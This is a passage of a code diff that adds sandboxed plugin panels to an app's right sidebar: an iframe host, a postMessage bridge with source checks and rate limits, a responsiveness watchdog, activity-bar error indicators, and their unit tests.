+      onPong: (pingId) => watchdog.handlePong(pingId)
+    })
+    window.addEventListener('message', handler)
+    return () => {
+      active = false
+      window.removeEventListener('message', handler)
+    }
+  }, [panelDocument, sessionToken, watchdog])
+
+  useEffect(() => {
+    if (!panelFrameKey || loadedFrameKey !== panelFrameKey) {
+      return
+    }
+    // The srcdoc prelude must install its pong listener before the first ping;
+    // otherwise a healthy panel can lose the startup ping and be suspended.
+    watchdog.start()
+    return () => watchdog.stop()
+  }, [loadedFrameKey, panelFrameKey, watchdog])
+
+  useEffect(() => {
+    if (!pluginKey || !panelId) {
+      return
+    }
+    let cancelled = false
+    let currentHtml: string | null = null
+    let documentRevision = 0
+    setEntryState({ status: 'loading' })
+    setSessionToken(null)
+    const pluginsApi = window.api?.plugins
+    if (!pluginsApi) {
+      setPanelHealth(tabKey, 'error')
+      setEntryState({ status: 'error' })
+      return
+    }
+    let loadGeneration = 0
+    const load = (): void => {
+      const generation = ++loadGeneration
+      pluginsApi
+        .readPanelEntry({ pluginKey, panelId })
+        .then((entry) => {
+          if (cancelled || generation !== loadGeneration) {
+            return
+          }
+          if (!entry) {
+            currentHtml = null
+            setSessionToken(null)
+            setPanelHealth(tabKey, 'error')
+            setEntryState({ status: 'error' })
+            return
+          }
+          // Session rotation rebinds authority without replacing an unchanged
+          // document or restarting its watchdog.
+          setSessionToken(entry.sessionToken)
+          setPanelHealth(tabKey, 'healthy')
+          if (entry.html !== currentHtml) {
+            currentHtml = entry.html
+            documentRevision += 1
+            setPanelHealth(tabKey, 'healthy')
+            setEntryState({
+              status: 'ready',
+              shellHtml: entry.html,
+              documentRevision
+            })
+          }
+        })
+        .catch(() => {
+          if (!cancelled && generation === loadGeneration) {
+            currentHtml = null
+            setSessionToken(null)
+            setPanelHealth(tabKey, 'error')
+            setEntryState({ status: 'error' })
+          }
+        })
+    }
+    load()
+    const unsubscribe = pluginsApi.onChanged ? pluginsApi.onChanged(load) : null
+    return () => {
+      cancelled = true
+      loadGeneration += 1
+      unsubscribe?.()
+    }
+  }, [panelId, pluginKey, setPanelHealth, tabKey])
+
+  // Persisted plugin tabs can outlive their plugin (uninstalled/disabled);
+  // render a graceful empty state instead of a broken frame.
+  if (!panel) {
+    return (
+      <PluginPanelMessage>
+        {translate(
+          'auto.components.right.sidebar.PluginPanel.unavailable',
+          'This plugin panel is no longer available.'
+        )}
+      </PluginPanelMessage>
+    )
+  }
+
+  if (entryState.status === 'loading') {
+    return (
+      <PluginPanelMessage>
+        {translate('auto.components.right.sidebar.PluginPanel.loading', 'Loading plugin panel...')}
+      </PluginPanelMessage>
+    )
+  }
+
+  if (entryState.status === 'unresponsive') {
+    return (
+      <PluginPanelMessage>
+        {translate(
+          'auto.components.right.sidebar.PluginPanel.unresponsive',
+          'This plugin panel stopped responding and was suspended.'
+        )}
+      </PluginPanelMessage>
+    )
+  }
+
+  if (entryState.status === 'error') {
+    return (
+      <PluginPanelMessage>
+        {translate(
+          'auto.components.right.sidebar.PluginPanel.loadFailed',
+          'The plugin panel could not be loaded.'
+        )}
+      </PluginPanelMessage>
+    )
+  }
+
+  return (
+    <iframe
+      key={panelFrameKey}
+      ref={iframeRef}
+      // SECURITY: never add allow-same-origin — the srcdoc frame must stay an
+      // opaque origin so plugin UI cannot reach the app DOM, storage, or IPC.
+      // The srcdoc itself is the host CSP shell wrapped around plugin HTML.
+      sandbox="allow-scripts"
+      name={`${PLUGIN_PANEL_FRAME_NAME_PREFIX}${tabKey}`}
+      srcDoc={panelDocument ?? ''}
+      onLoad={() => setLoadedFrameKey(panelFrameKey)}
+      title={panel.title}
+      className="h-full w-full flex-1 border-0 bg-background"
+    />
+  )
+}
+
+export default PluginPanel

--- a/src/renderer/src/components/right-sidebar/activity-bar-buttons.test.tsx
+++ b/src/renderer/src/components/right-sidebar/activity-bar-buttons.test.tsx
@@ -1,0 +1,47 @@
+// @vitest-environment happy-dom
+
+import { act } from 'react'
+import { createRoot } from 'react-dom/client'
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import { TopActivityOverflowMenu, type ActivityBarItem } from './activity-bar-buttons'
+
+vi.mock('@/i18n/i18n', () => ({
+  translate: (_key: string, fallback: string) => fallback
+}))
+
+const roots: ReturnType<typeof createRoot>[] = []
+
+afterEach(async () => {
+  await act(async () => {
+    for (const root of roots.splice(0)) {
+      root.unmount()
+    }
+  })
+  document.body.innerHTML = ''
+})
+
+describe('TopActivityOverflowMenu', () => {
+  it('announces a hidden plugin panel error from the More button', async () => {
+    const container = document.createElement('div')
+    document.body.appendChild(container)
+    const root = createRoot(container)
+    roots.push(root)
+    const item: ActivityBarItem = {
+      id: 'plugin:orca-samples.demo/dashboard',
+      icon: () => <span />,
+      title: 'Demo',
+      shortcut: '',
+      statusIndicator: 'failure'
+    }
+
+    await act(async () => {
+      root.render(
+        <TopActivityOverflowMenu items={[item]} activeTab="explorer" onSelect={vi.fn()} />
+      )
+    })
+
+    expect(container.querySelector('button')?.getAttribute('aria-label')).toBe(
+      'More sidebar tabs — Error'
+    )
+  })
+})

--- a/src/renderer/src/components/right-sidebar/activity-bar-buttons.tsx
+++ b/src/renderer/src/components/right-sidebar/activity-bar-buttons.tsx
@@ -25,6 +25,8 @@ export type ActivityBarItem = {
   folderOnly?: boolean
   /** When true, shown only for worktrees that belong to an SSH repo. */
   sshOnly?: boolean
+  /** Host-owned health indicator; plugin content cannot style this chrome. */
+  statusIndicator?: CheckStatus
 }
 
 const STATUS_DOT_COLOR: Record<CheckStatus, string> = {
@@ -32,6 +34,13 @@ const STATUS_DOT_COLOR: Record<CheckStatus, string> = {
   failure: 'bg-rose-500',
   pending: 'bg-amber-500',
   neutral: 'bg-muted-foreground'
+}
+
+function activityItemAriaLabel(item: ActivityBarItem, status?: CheckStatus | null): string {
+  const base = item.shortcut ? `${item.title} (${item.shortcut})` : item.title
+  return status === 'failure'
+    ? `${base} — ${translate('auto.components.right.sidebar.activityBar.error', 'Error')}`
+    : base
 }
 
 export function TopActivityOverflowMenu({
@@ -49,6 +58,13 @@ export function TopActivityOverflowMenu({
     checksStatus && checksStatus !== 'neutral' && items.some((item) => item.id === 'checks')
       ? checksStatus
       : null
+  const hiddenItemStatus = items.some((item) => item.statusIndicator === 'failure')
+    ? 'failure'
+    : hiddenChecksStatus
+  const moreTabsLabel = translate(
+    'auto.components.right.sidebar.activity.bar.buttons.1fd284e931',
+    'More sidebar tabs'
+  )
 
   return (
     <DropdownMenu>
@@ -59,17 +75,18 @@ export function TopActivityOverflowMenu({
             'relative flex h-[36px] w-8 shrink-0 items-center justify-center text-muted-foreground/60 transition-colors hover:text-muted-foreground focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring',
             RIGHT_SIDEBAR_HEADER_NO_DRAG_CLASS_NAME
           )}
-          aria-label={translate(
-            'auto.components.right.sidebar.activity.bar.buttons.1fd284e931',
-            'More sidebar tabs'
-          )}
+          aria-label={
+            hiddenItemStatus === 'failure'
+              ? `${moreTabsLabel} — ${translate('auto.components.right.sidebar.activityBar.error', 'Error')}`
+              : moreTabsLabel
+          }
         >
           <MoreHorizontal size={16} />
-          {hiddenChecksStatus && (
+          {hiddenItemStatus && (
             <div
               className={cn(
                 'absolute top-[8px] right-[4px] size-[7px] rounded-full ring-1 ring-sidebar',
-                STATUS_DOT_COLOR[hiddenChecksStatus] ?? 'bg-muted-foreground'
+                STATUS_DOT_COLOR[hiddenItemStatus] ?? 'bg-muted-foreground'
               )}
             />
           )}
@@ -85,9 +102,16 @@ export function TopActivityOverflowMenu({
               onSelect={() => onSelect(item.id)}
               className={cn(active && 'bg-accent text-accent-foreground')}
               aria-current={active ? 'page' : undefined}
+              aria-label={activityItemAriaLabel(item, item.statusIndicator)}
             >
               <Icon size={14} />
               <span>{item.title}</span>
+              {item.statusIndicator === 'failure' ? (
+                <span
+                  className={cn('ml-auto size-2 rounded-full', STATUS_DOT_COLOR.failure)}
+                  aria-hidden="true"
+                />
+              ) : null}
               {item.shortcut && <DropdownMenuShortcut>{item.shortcut}</DropdownMenuShortcut>}
             </DropdownMenuItem>
           )
@@ -112,6 +136,7 @@ export function ActivityBarButton({
 }): React.JSX.Element {
   const Icon = item.icon
   const isTop = layout === 'top'
+  const effectiveStatus = item.statusIndicator ?? statusIndicator
 
   return (
     <Tooltip>
@@ -125,16 +150,16 @@ export function ActivityBarButton({
             active ? 'text-foreground' : 'text-muted-foreground/60 hover:text-muted-foreground'
           )}
           onClick={onClick}
-          aria-label={item.shortcut ? `${item.title} (${item.shortcut})` : item.title}
+          aria-label={activityItemAriaLabel(item, effectiveStatus)}
         >
           <Icon size={isTop ? 16 : 18} />
 
-          {statusIndicator && statusIndicator !== 'neutral' && (
+          {effectiveStatus && effectiveStatus !== 'neutral' && (
             <div
               className={cn(
                 'absolute rounded-full size-[7px] ring-1 ring-sidebar',
                 isTop ? 'top-[8px] right-[5px]' : 'top-[7px] right-[7px]',
-                STATUS_DOT_COLOR[statusIndicator] ?? 'bg-muted-foreground'
+                STATUS_DOT_COLOR[effectiveStatus] ?? 'bg-muted-foreground'
               )}
             />
           )}

--- a/src/renderer/src/components/right-sidebar/index.tsx
+++ b/src/renderer/src/components/right-sidebar/index.tsx
@@ -26,6 +26,12 @@ import {
 } from './activity-bar-buttons'
 import { getActiveChecksStatus } from './active-checks-status'
 import { getVisibleRightSidebarActivityItems } from './right-sidebar-activity-visibility'
+import { getPluginPanelActivityItems } from './plugin-panel-activity-items'
+import {
+  collectInstalledPluginTabKeys,
+  usePluginPanels,
+  usePluginPanelsStore
+} from '@/store/plugin-panels'
 import { useShortcutLabel } from '@/hooks/useShortcutLabel'
 import {
   RIGHT_SIDEBAR_HEADER_NO_DRAG_CLASS_NAME,
@@ -48,6 +54,7 @@ import {
   shouldRenderDesktopWindowChrome
 } from '@/lib/desktop-window-chrome'
 import { getRendererAppPlatform } from '@/lib/renderer-app-platform'
+import { useInstalledPluginRouteReconciliation } from './use-installed-plugin-route-reconciliation'
 
 const ACTIVITY_BAR_SIDE_WIDTH = 40
 
@@ -84,6 +91,19 @@ function RightSidebarInner(): React.JSX.Element {
   const isFolderWorkspace = activeWorkspaceScope?.type === 'folder'
   const isFolder = isFolderWorkspace || (activeRepo ? isFolderRepo(activeRepo) : false)
   const isSshRepo = Boolean(activeRepo?.connectionId)
+  const pluginSystemEnabled = useAppStore((s) => s.settings?.pluginSystemEnabled === true)
+  const pluginPanels = usePluginPanels()
+  const visiblePluginPanels = useMemo(
+    () => (pluginSystemEnabled ? pluginPanels : []),
+    [pluginPanels, pluginSystemEnabled]
+  )
+  const installedPlugins = usePluginPanelsStore((s) => s.plugins)
+  const pluginFetchStatus = usePluginPanelsStore((s) => s.fetchStatus)
+  const pluginPanelErrors = usePluginPanelsStore((s) => s.panelErrors)
+  const installedPluginTabKeys = useMemo(
+    () => collectInstalledPluginTabKeys(installedPlugins),
+    [installedPlugins]
+  )
 
   const activityItems = useMemo<ActivityBarItem[]>(
     () => [
@@ -136,9 +156,19 @@ function RightSidebarInner(): React.JSX.Element {
         title: translate('auto.components.right.sidebar.index.441733b630', 'Ports'),
         shortcut: portsShortcut === 'Unassigned' ? '' : portsShortcut,
         sshOnly: true
-      }
+      },
+      // Why: plugin panels append after the built-in tabs so core navigation
+      // keeps stable positions regardless of which plugins are installed.
+      ...getPluginPanelActivityItems(visiblePluginPanels, pluginPanelErrors)
     ],
-    [checksShortcut, explorerShortcut, portsShortcut, sourceControlShortcut]
+    [
+      checksShortcut,
+      explorerShortcut,
+      pluginPanelErrors,
+      visiblePluginPanels,
+      portsShortcut,
+      sourceControlShortcut
+    ]
   )
 
   const visibleItems = useMemo(
@@ -159,7 +189,12 @@ function RightSidebarInner(): React.JSX.Element {
   // worktree), render a visible fallback without overwriting the stored route.
   // Folder workspaces keep a session-local effective-tab memory so a PR Checks
   // row can open a child Checks tab without erasing the parent's overview tab.
-  const normalizedActiveTab = normalizeRightSidebarRoute(rightSidebarTab).rightSidebarTab
+  // Why: pass the installed-panel set so a persisted tab for an UNINSTALLED
+  // plugin drops to Explorer instead of surviving as a dead route.
+  const normalizedActiveTab = normalizeRightSidebarRoute(rightSidebarTab, undefined, {
+    installedPluginTabKeys:
+      pluginSystemEnabled && pluginFetchStatus === 'ready' ? installedPluginTabKeys : undefined
+  }).rightSidebarTab
   const rememberedFolderTab = activeFolderWorkspaceKey
     ? rememberedFolderTabByWorkspaceKeyRef.current[activeFolderWorkspaceKey]
     : null
@@ -173,6 +208,14 @@ function RightSidebarInner(): React.JSX.Element {
     visibleItems,
     activeFolderWorkspaceKey,
     rememberedFolderTab: requestedFolderTab ?? rememberedFolderTab
+  })
+
+  useInstalledPluginRouteReconciliation({
+    pluginSystemEnabled,
+    fetchStatus: pluginFetchStatus,
+    storedTab: rightSidebarTab,
+    normalizedTab: normalizedActiveTab,
+    setStoredTab: setRightSidebarTab
   })
 
   useEffect(() => {

--- a/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.test.ts
@@ -1,0 +1,24 @@
+import { describe, expect, it } from 'vitest'
+import type { ActivePluginPanel } from '@/store/plugin-panels'
+import { getPluginPanelActivityItems } from './plugin-panel-activity-items'
+
+const panel: ActivePluginPanel = {
+  id: 'dashboard',
+  title: 'Dashboard',
+  tabKey: 'plugin:orca-samples.demo/dashboard',
+  pluginKey: 'orca-samples.demo',
+  pluginName: 'Demo'
+}
+
+describe('getPluginPanelActivityItems', () => {
+  it('projects watchdog failure into host-owned activity chrome', () => {
+    expect(
+      getPluginPanelActivityItems([panel], {
+        'plugin:orca-samples.demo/dashboard': true
+      })[0]
+    ).toMatchObject({
+      id: panel.tabKey,
+      statusIndicator: 'failure'
+    })
+  })
+})

--- a/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-activity-items.ts
@@ -1,0 +1,90 @@
+import {
+  Activity,
+  BarChart3,
+  Bell,
+  Blocks,
+  Book,
+  Bot,
+  Bug,
+  Calendar,
+  Cloud,
+  Code,
+  Database,
+  FileText,
+  Flag,
+  Folder,
+  Gauge,
+  Globe,
+  Hammer,
+  Layers,
+  Lightbulb,
+  Package,
+  Plug,
+  Puzzle,
+  Rocket,
+  Star,
+  Terminal,
+  Wrench,
+  Zap
+} from 'lucide-react'
+import type { ActivePluginPanel } from '@/store/plugin-panels'
+import type { ActivityBarItem } from './activity-bar-buttons'
+
+type PluginPanelIcon = ActivityBarItem['icon']
+
+// Why: importing lucide's full `icons` map would bundle every icon and defeat
+// tree-shaking, so plugin manifests pick from this curated set (fallback: Plug).
+const PLUGIN_PANEL_ICONS: Record<string, PluginPanelIcon> = {
+  activity: Activity,
+  barchart3: BarChart3,
+  bell: Bell,
+  blocks: Blocks,
+  book: Book,
+  bot: Bot,
+  bug: Bug,
+  calendar: Calendar,
+  cloud: Cloud,
+  code: Code,
+  database: Database,
+  filetext: FileText,
+  flag: Flag,
+  folder: Folder,
+  gauge: Gauge,
+  globe: Globe,
+  hammer: Hammer,
+  layers: Layers,
+  lightbulb: Lightbulb,
+  package: Package,
+  plug: Plug,
+  puzzle: Puzzle,
+  rocket: Rocket,
+  star: Star,
+  terminal: Terminal,
+  wrench: Wrench,
+  zap: Zap
+}
+
+export function resolvePluginPanelIcon(iconName: string | undefined): PluginPanelIcon {
+  if (!iconName) {
+    return Plug
+  }
+  // Accept both lucide naming styles ('file-text' and 'FileText').
+  const normalized = iconName.replaceAll('-', '').toLowerCase()
+  return PLUGIN_PANEL_ICONS[normalized] ?? Plug
+}
+
+/** Maps active plugin panel contributions onto right-sidebar activity items. */
+export function getPluginPanelActivityItems(
+  panels: ActivePluginPanel[],
+  panelErrors: Readonly<Record<string, true>> = {}
+): ActivityBarItem[] {
+  return panels.map((panel) => ({
+    id: panel.tabKey,
+    icon: resolvePluginPanelIcon(panel.icon),
+    // Why: panel titles come from plugin manifests, not the app catalog, so
+    // they render untranslated by design.
+    title: panel.title,
+    shortcut: '',
+    ...(panelErrors[panel.tabKey] ? { statusIndicator: 'failure' as const } : {})
+  }))
+}

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.test.ts
@@ -1,0 +1,205 @@
+import { describe, expect, it, vi } from 'vitest'
+import type { PluginPanelActionOutcome } from '../../../../shared/plugins/plugin-panel-bridge'
+import type { PanelMessageBudget } from '../../../../shared/plugins/plugin-panel-message-budget'
+import { createPanelBridgeMessageHandler } from './plugin-panel-bridge-host'
+
+type FakePanelWindow = Window & { postMessage: ReturnType<typeof vi.fn> }
+
+function createFakePanelWindow(): FakePanelWindow {
+  return { postMessage: vi.fn() } as unknown as FakePanelWindow
+}
+
+function messageEvent(data: unknown, source: unknown): MessageEvent {
+  // The handler only reads .data and .source, so a plain object stands in for
+  // a real MessageEvent without needing a DOM environment.
+  return { data, source } as unknown as MessageEvent
+}
+
+const flush = (): Promise<void> => new Promise((resolve) => setTimeout(resolve, 0))
+
+const VALID_DATA = {
+  type: 'orca-panel-action',
+  requestId: 'req-1',
+  action: 'terminal.sendText',
+  params: { terminalId: 'term-1', text: '/model haiku', enter: true }
+}
+const SESSION_TOKEN = 's'.repeat(43)
+
+function createHandler(
+  panelWindow: FakePanelWindow,
+  outcome: PluginPanelActionOutcome = { ok: true, value: { accepted: true } }
+): { handler: (event: MessageEvent) => void; callPanelAction: ReturnType<typeof vi.fn> } {
+  const callPanelAction = vi.fn().mockResolvedValue(outcome)
+  const handler = createPanelBridgeMessageHandler({
+    sessionToken: SESSION_TOKEN,
+    getPanelWindow: () => panelWindow,
+    callPanelAction
+  })
+  return { handler, callPanelAction }
+}
+
+describe('createPanelBridgeMessageHandler', () => {
+  it('relays a valid request and posts the success result back into the panel', async () => {
+    const panelWindow = createFakePanelWindow()
+    const { handler, callPanelAction } = createHandler(panelWindow)
+
+    handler(messageEvent(VALID_DATA, panelWindow))
+    await flush()
+
+    expect(callPanelAction).toHaveBeenCalledWith({
+      sessionToken: SESSION_TOKEN,
+      action: 'terminal.sendText',
+      params: { terminalId: 'term-1', text: '/model haiku', enter: true }
+    })
+    expect(panelWindow.postMessage).toHaveBeenCalledWith(
+      {
+        type: 'orca-panel-action-result',
+        requestId: 'req-1',
+        ok: true,
+        value: { accepted: true }
+      },
+      '*'
+    )
+  })
+
+  it('ignores messages whose source is not the panel iframe window', async () => {
+    const panelWindow = createFakePanelWindow()
+    const { handler, callPanelAction } = createHandler(panelWindow)
+
+    handler(messageEvent(VALID_DATA, createFakePanelWindow()))
+    handler(messageEvent(VALID_DATA, null))
+    await flush()
+
+    expect(callPanelAction).not.toHaveBeenCalled()
+    expect(panelWindow.postMessage).not.toHaveBeenCalled()
+  })
+
+  it('ignores unrelated window messages without replying', async () => {
+    const panelWindow = createFakePanelWindow()
+    const { handler, callPanelAction } = createHandler(panelWindow)
+
+    handler(messageEvent({ type: 'react-devtools-bridge' }, panelWindow))
+    handler(messageEvent('plain string', panelWindow))
+    await flush()
+
+    expect(callPanelAction).not.toHaveBeenCalled()
+    expect(panelWindow.postMessage).not.toHaveBeenCalled()
+  })
+
+  it('answers a malformed bridge request with invalid_request instead of relaying it', async () => {
+    const panelWindow = createFakePanelWindow()
+    const { handler, callPanelAction } = createHandler(panelWindow)
+
+    handler(messageEvent({ ...VALID_DATA, action: 'fs.readFile' }, panelWindow))
+    await flush()
+
+    expect(callPanelAction).not.toHaveBeenCalled()
+    expect(panelWindow.postMessage).toHaveBeenCalledWith(
+      expect.objectContaining({
+        type: 'orca-panel-action-result',
+        requestId: 'req-1',
+        ok: false,
+        errorCode: 'invalid_request'
+      }),
+      '*'
+    )
+  })
+
+  it('relays a denial outcome (missing manifest permission) back to the panel', async () => {
+    const panelWindow = createFakePanelWindow()
+    const { handler } = createHandler(panelWindow, {
+      ok: false,
+      code: 'capability_denied',
+      error: 'plugin does not have the "terminal.sendText" permission'
+    })
+
+    handler(messageEvent(VALID_DATA, panelWindow))
+    await flush()
+
+    expect(panelWindow.postMessage).toHaveBeenCalledWith(
+      {
+        type: 'orca-panel-action-result',
+        requestId: 'req-1',
+        ok: false,
+        errorCode: 'capability_denied',
+        error: 'plugin does not have the "terminal.sendText" permission'
+      },
+      '*'
+    )
+  })
+
+  it('reports a rejected relay call as action_failed', async () => {
+    const panelWindow = createFakePanelWindow()
+    const callPanelAction = vi.fn().mockRejectedValue(new Error('ipc broke'))
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction
+    })
+
+    handler(messageEvent(VALID_DATA, panelWindow))
+    await flush()
+
+    expect(panelWindow.postMessage).toHaveBeenCalledWith(
+      expect.objectContaining({ ok: false, errorCode: 'action_failed', error: 'ipc broke' }),
+      '*'
+    )
+  })
+
+  it('drops a deferred result after the requesting document is invalidated', async () => {
+    const panelWindow = createFakePanelWindow()
+    let active = true
+    let resolveCall!: (outcome: PluginPanelActionOutcome) => void
+    const callPanelAction = vi.fn(
+      () => new Promise<PluginPanelActionOutcome>((resolve) => (resolveCall = resolve))
+    )
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction,
+      isActive: () => active
+    })
+
+    handler(messageEvent(VALID_DATA, panelWindow))
+    active = false
+    resolveCall({ ok: true, value: { stale: true } })
+    await flush()
+
+    expect(panelWindow.postMessage).not.toHaveBeenCalled()
+  })
+
+  it('charges pong and invalid guest traffic before parsing either message', () => {
+    const panelWindow = createFakePanelWindow()
+    const admit = vi.fn<PanelMessageBudget['admit']>().mockReturnValue(null)
+    const onPong = vi.fn()
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction: vi.fn(),
+      onPong,
+      budget: { maxBytes: 1024, admit }
+    })
+
+    handler(messageEvent({ type: 'invalid-hostile-message' }, panelWindow))
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
+
+    expect(admit).toHaveBeenCalledTimes(2)
+    expect(onPong).toHaveBeenCalledWith(7)
+  })
+
+  it('does not accept a pong refused by the rate budget', () => {
+    const panelWindow = createFakePanelWindow()
+    const onPong = vi.fn()
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken: SESSION_TOKEN,
+      getPanelWindow: () => panelWindow,
+      callPanelAction: vi.fn(),
+      onPong,
+      budget: { maxBytes: 1024, admit: () => 'rate_limited' }
+    })
+
+    handler(messageEvent({ type: 'orca-panel-pong', pingId: 7 }, panelWindow))
+
+    expect(onPong).not.toHaveBeenCalled()
+  })
+})

--- a/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-bridge-host.ts
@@ -1,0 +1,160 @@
+import {
+  PANEL_ACTION_RESULT_TYPE,
+  looksLikePanelActionRequest,
+  looksLikePanelPong,
+  parsePanelActionRequest,
+  type PluginPanelActionOutcome,
+  type PluginPanelActionResultMessage
+} from '../../../../shared/plugins/plugin-panel-bridge'
+import {
+  createPanelMessageBudget,
+  structuredCloneMessageBytes,
+  type PanelMessageBudget
+} from '../../../../shared/plugins/plugin-panel-message-budget'
+import { translate } from '@/i18n/i18n'
+
+/**
+ * Host side of the plugin panel postMessage bridge. Framework-free so
+ * message validation, budgets, and relay behavior are directly
+ * unit-testable; PluginPanel wires the returned listener to `window` while
+ * the panel iframe is mounted.
+ *
+ * Main issues an opaque session while loading the mounted panel. The guest
+ * never sees or supplies plugin identity, and main binds the session again.
+ */
+
+export type PanelActionCall = {
+  sessionToken: string
+  action: string
+  params?: unknown
+}
+
+export type PanelBridgeHostOptions = {
+  sessionToken: string
+  /** The mounted panel iframe's contentWindow, or null when unmounted. */
+  getPanelWindow: () => Window | null
+  callPanelAction: (call: PanelActionCall) => Promise<PluginPanelActionOutcome>
+  /** False once the requesting panel document/session has been replaced. */
+  isActive?: () => boolean
+  onPong?: (pingId: number) => void
+  /** Injectable for tests; defaults to the shared per-plugin budget. */
+  budget?: PanelMessageBudget
+  now?: () => number
+}
+
+/** Relays a bridge call through the preload API, degrading to a bridge-level
+ *  error when the preload predates the plugins.panelAction surface. */
+export function callPanelActionViaPreload(
+  call: PanelActionCall
+): Promise<PluginPanelActionOutcome> {
+  const panelAction = window.api?.plugins?.panelAction
+  if (!panelAction) {
+    return Promise.resolve({
+      ok: false,
+      code: 'unavailable',
+      error: translate(
+        'auto.components.rightSidebar.pluginPanelBridgeHost.actionsUnavailable',
+        'Plugin actions are not available in this client.'
+      )
+    })
+  }
+  return panelAction(call)
+}
+
+export function createPanelBridgeMessageHandler(
+  options: PanelBridgeHostOptions
+): (event: MessageEvent) => void {
+  const budget = options.budget ?? createPanelMessageBudget()
+  const now = options.now ?? (() => Date.now())
+  return (event: MessageEvent): void => {
+    const panelWindow = options.getPanelWindow()
+    // Why: the sandboxed srcdoc frame has an opaque origin ("null"), so the
+    // sending window's identity — not event.origin — is the only trustworthy
+    // check that this message came from our panel and not another frame.
+    if (!panelWindow || event.source !== panelWindow) {
+      return
+    }
+    const requestingWindow = panelWindow
+    const respond = (message: PluginPanelActionResultMessage): void => {
+      if (options.isActive?.() === false || options.getPanelWindow() !== requestingWindow) {
+        return
+      }
+      // Why: targetOrigin must be '*' — an opaque origin never matches a
+      // concrete origin, so anything stricter would silently drop the reply.
+      requestingWindow.postMessage(message, '*')
+    }
+    // Budgets run before parsing: a flood of malformed junk must not buy
+    // free schema-validation CPU either.
+    const refusal = budget.admit(now(), structuredCloneMessageBytes(event.data, budget.maxBytes))
+    if (refusal) {
+      const requestId =
+        typeof event.data === 'object' && event.data !== null
+          ? (event.data as { requestId?: unknown }).requestId
+          : undefined
+      if (typeof requestId === 'string' && requestId.length > 0 && requestId.length <= 128) {
+        respond({
+          type: PANEL_ACTION_RESULT_TYPE,
+          requestId,
+          ok: false,
+          errorCode: refusal === 'oversized' ? 'invalid_request' : 'rate_limited',
+          error:
+            refusal === 'oversized'
+              ? translate(
+                  'auto.components.rightSidebar.pluginPanelBridgeHost.messageTooLarge',
+                  'Message exceeds the size limit.'
+                )
+              : translate(
+                  'auto.components.rightSidebar.pluginPanelBridgeHost.tooManyRequests',
+                  'Too many requests.'
+                )
+        })
+      }
+      return
+    }
+    if (looksLikePanelPong(event.data)) {
+      options.onPong?.((event.data as { pingId: number }).pingId)
+      return
+    }
+    if (!looksLikePanelActionRequest(event.data)) {
+      return
+    }
+    const parsed = parsePanelActionRequest(event.data)
+    if (!parsed.ok) {
+      if (parsed.requestId) {
+        respond({
+          type: PANEL_ACTION_RESULT_TYPE,
+          requestId: parsed.requestId,
+          ok: false,
+          errorCode: 'invalid_request',
+          error: parsed.error
+        })
+      }
+      return
+    }
+    const { requestId, action, params } = parsed.request
+    options
+      .callPanelAction({ sessionToken: options.sessionToken, action, params })
+      .then((outcome) => {
+        respond(
+          outcome.ok
+            ? { type: PANEL_ACTION_RESULT_TYPE, requestId, ok: true, value: outcome.value }
+            : {
+                type: PANEL_ACTION_RESULT_TYPE,
+                requestId,
+                ok: false,
+                errorCode: outcome.code,
+                error: outcome.error
+              }
+        )
+      })
+      .catch((error: unknown) => {
+        respond({
+          type: PANEL_ACTION_RESULT_TYPE,
+          requestId,
+          ok: false,
+          errorCode: 'action_failed',
+          error: error instanceof Error ? error.message : String(error)
+        })
+      })
+  }
+}

--- a/src/renderer/src/components/right-sidebar/plugin-panel-design-token-css.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-design-token-css.ts
@@ -1,0 +1,23 @@
+import { PANEL_DESIGN_TOKEN_ALLOWLIST } from '../../../../shared/plugins/plugin-panel-shell'
+
+/**
+ * Snapshots the curated design-token subset from the live document so panel
+ * documents can match the app without any access to it. Values are read from
+ * computed styles (trusted origin) but still stripped of structural CSS
+ * characters before landing inside the shell's <style> block.
+ */
+export function buildPanelDesignTokenCss(): string {
+  const styles = getComputedStyle(document.documentElement)
+  const declarations: string[] = []
+  for (const token of PANEL_DESIGN_TOKEN_ALLOWLIST) {
+    const value = styles.getPropertyValue(token).trim()
+    if (value.length > 0) {
+      declarations.push(`${token}:${value.replaceAll(/[{}<>;]/g, '')}`)
+    }
+  }
+  return declarations.join(';')
+}
+
+export function currentPanelColorScheme(): 'light' | 'dark' {
+  return document.documentElement.classList.contains('dark') ? 'dark' : 'light'
+}

--- a/src/renderer/src/components/right-sidebar/plugin-panel-watchdog.test.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-watchdog.test.ts
@@ -1,0 +1,50 @@
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+import { createPanelWatchdog } from './plugin-panel-watchdog'
+
+describe('createPanelWatchdog', () => {
+  beforeEach(() => vi.useFakeTimers())
+  afterEach(() => vi.useRealTimers())
+
+  it('can start again after StrictMode-style setup cleanup', () => {
+    const sendPing = vi.fn()
+    const onUnresponsive = vi.fn()
+    const watchdog = createPanelWatchdog({
+      sendPing,
+      onUnresponsive,
+      pingIntervalMs: 100,
+      pongTimeoutMs: 50
+    })
+
+    watchdog.start()
+    watchdog.stop()
+    watchdog.start()
+    expect(sendPing.mock.calls.map(([pingId]) => pingId)).toEqual([0, 1])
+
+    watchdog.handlePong(1)
+    vi.advanceTimersByTime(100)
+    watchdog.handlePong(2)
+    expect(onUnresponsive).not.toHaveBeenCalled()
+
+    watchdog.stop()
+    vi.advanceTimersByTime(1_000)
+    expect(onUnresponsive).not.toHaveBeenCalled()
+  })
+
+  it('clears its interval when a pong deadline expires', () => {
+    const sendPing = vi.fn()
